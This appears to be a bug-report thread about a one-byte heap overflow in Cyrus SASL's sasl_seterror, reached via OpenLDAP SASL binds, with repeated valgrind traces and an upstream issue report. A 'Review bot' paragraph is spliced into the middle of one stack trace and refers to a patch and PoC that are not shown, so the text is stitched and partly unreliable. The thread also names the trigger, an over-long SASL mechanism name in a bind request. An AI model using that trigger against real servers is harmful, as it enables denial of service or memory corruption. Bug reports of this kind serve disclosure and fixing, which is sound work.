Git history shows this bug has existed since the code was originally written in ommit 061698456069833e244d66ce33c8f82c2cd63ce3 Author: Rob Siemborski <rjs3@andrew.cmu.edu> Date: Tue Dec 4 01:59:43 2001 +0000 > > Best > > -Stephan > > On 11/28/19 3:54 PM, Howard Chu wrote: >> Resending with the non-printable chars omitted: >> >> Howard Chu wrote: >>> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting >>> this issue to them. >>> >>> valgrind confirms it as well: >>> >>> 5ddfddde do_bind: dn () SASL mech <garbage> >>> 5ddfddde ==> sasl_bind: dn="" mech=<garbage> >>> datalen=0 >>> ==11019== Thread 3: >>> ==11019== Invalid write of size 1 >>> ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >>> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >>> ==11019== by 0x4EFA322: clone (clone.S:95) >>> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >>> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >>> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >>> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 
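Review bot: The `+1` is applied to `addlen` itself rather than to the size requested from `_buf_alloc`, so if `addlen` is reused after the hunk for the copy length and the `*outlen` update (the rest of `_sasl_add_string` lies outside the hunk), the terminator would now be counted as part of the appended text and each later append would land after an embedded NUL. The narrower fix keeps `addlen=strlen(add)` and reserves the extra byte only where the buffer is sized: `if (_buf_alloc(out, alloclen, (*outlen)+addlen+1)!=SASL_OK)`. Either way the commit message should name the root cause the valgrind trace shows — the buffer is sized for the string bytes only, and the one-byte write in `sasl_seterror` (seterror.c:247, presumably the terminator) lands 0 bytes past the 600-byte block — and a regression test that feeds `sasl_seterror` an over-long mechanism name, as this PoC does through the bind's SASL mechanism field, would keep it from reappearing.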
0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >>> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >>> ==11019== >>> ==11019== Invalid read of size 1 >>> ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) >>> ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) >>> ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) >>> ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) >>> ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >>> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >>> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >>> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== by 0x35DFF9: 
ldap_int_thread_pool_wrapper (tpool.c:1048) >>> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >>> >>> >>> >>> >> > -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/
Created an issue upstream [1] and included the valgrind output and proposed patch. [1] https://github.com/cyrusimap/cyrus-sasl/issues/587 -Stephan On 11/28/19 4:16 PM, Howard Chu wrote: > 5ddfddde do_bind: dn () SASL mech <garbage> > 5ddfddde ==> sasl_bind: dn="" mech=<garbage> > datalen=0 > ==11019== Thread 3: > ==11019== Invalid write of size 1 > ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== by 0x4EFA322: clone (clone.S:95) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== > ==11019== Invalid read of size 1 > ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) > ==11019== by 
0x4E67029: __vsnprintf_internal (vsnprintf.c:114) > ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) > ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) > ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479)
Not an OpenLDAP bug: the valgrind trace places the out-of-bounds write inside Cyrus SASL (sasl_seterror writing past the buffer that _sasl_add_string/_buf_alloc sized too small), and it has been fixed in cyrus-sasl upstream (see the issue linked above).